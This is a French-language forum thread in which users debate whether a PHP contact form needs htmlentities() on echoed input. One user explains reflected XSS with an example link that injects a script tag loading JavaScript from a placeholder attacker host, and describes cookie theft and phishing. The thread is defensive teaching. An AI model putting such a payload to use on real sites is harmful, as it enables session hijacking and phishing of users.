FORMULAIRE ENVOI PAR MAIL AVEC MESSAGE D'ERREUR

cs_GRenard
Messages postés
1662
Date d'inscription
lundi 16 septembre 2002
Statut
Membre
Dernière intervention
30 juillet 2008
- 22 juil. 2004 à 18:49
mickadevelop
Messages postés
55
Date d'inscription
mardi 15 février 2005
Statut
Membre
Dernière intervention
4 juin 2010
- 26 juin 2007 à 21:40
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/24784-formulaire-envoi-par-mail-avec-message-d-erreur

mickadevelop
Messages postés
55
Date d'inscription
mardi 15 février 2005
Statut
Membre
Dernière intervention
4 juin 2010

26 juin 2007 à 21:40
Ok je n'avais pas pensé a ce cas de figure. Merci et donc en conclusion il faut filtrer le html(avec htmlentites)toutes les variables demandé à l'utilisateur et que l'on affiche au format html!!!!!
winwarrior
Messages postés
654
Date d'inscription
jeudi 3 avril 2003
Statut
Membre
Dernière intervention
10 février 2009
1
26 juin 2007 à 19:30
Le hacker peut inciter une personne à cliquer sur un lien (social engineering)
(exemple: http://sitevulnerable.com/?variablePasSecurisée=<script src="http://siteduhacker.com/scriptMalveillant.js"></script>);
la victime en cliquant sur le lien (le hacker l'aura bien entendu camouflé) injectera dans sa propre page le code javascript du hacker
mickadevelop
Messages postés
55
Date d'inscription
mardi 15 février 2005
Statut
Membre
Dernière intervention
4 juin 2010

26 juin 2007 à 16:35
Oui je suis entierement d'accord avec toi qu'il ne faut pas laisser le javascript actif!! mais ce raisonnement n'a de valeur uniquement si un internaute malveillant mes un codes javascript sur une pages que d'autres interanutes peuvent consulter (par exemple dans un forum). Pour le cas qui est exposé au dessus on va afficher les variables saisies par l'utilisateur temporairement sur la page et il n'y aura uniquement que l'internaute qui les aura saisies qui sera concerné par ces variables. En conséquence si il rentre du javascript il ne pourra uniquement que lire ces propres cookies ou ce rediriger que lui meme vers une autre page web. Les conséquences ne seront valable uniquement que pour l'internaute qui a saisie les variable. Donnez moi votre avis sur ce raisonnement?
winwarrior
Messages postés
654
Date d'inscription
jeudi 3 avril 2003
Statut
Membre
Dernière intervention
10 février 2009
1
26 juin 2007 à 02:10
Combiné avec du social engineering (la victime devra cliquer sur le lien),
Un hacker pourrait mettre (par exemple) un code javascript qui lui enverrait le cookie de la victime sur ce domaine, ou ouvrirait une nouvelle fenetre avec une fausse identification ebay ou paypal (fishing) etc.. on peut presque tout faire en javascript
Donc non, ça ne sert pas à rien =)
mickadevelop
Messages postés
55
Date d'inscription
mardi 15 février 2005
Statut
Membre
Dernière intervention
4 juin 2010

25 juin 2007 à 23:36
salut, ca sert à rien de mettre htmlentities() puisque si il met des balises html elle ne seront actives que pour l'utilisateur (donc que pour le mec qui les met) si il a envi d'avoir des merdes sur ca page c'est sont probleme. J'aimerais avoir votre avis sur ce sujet peut etre n'ai- je pas pensé à une faille de securité lié à du javascripte ou autre merci :)
Afficher les 13 commentaires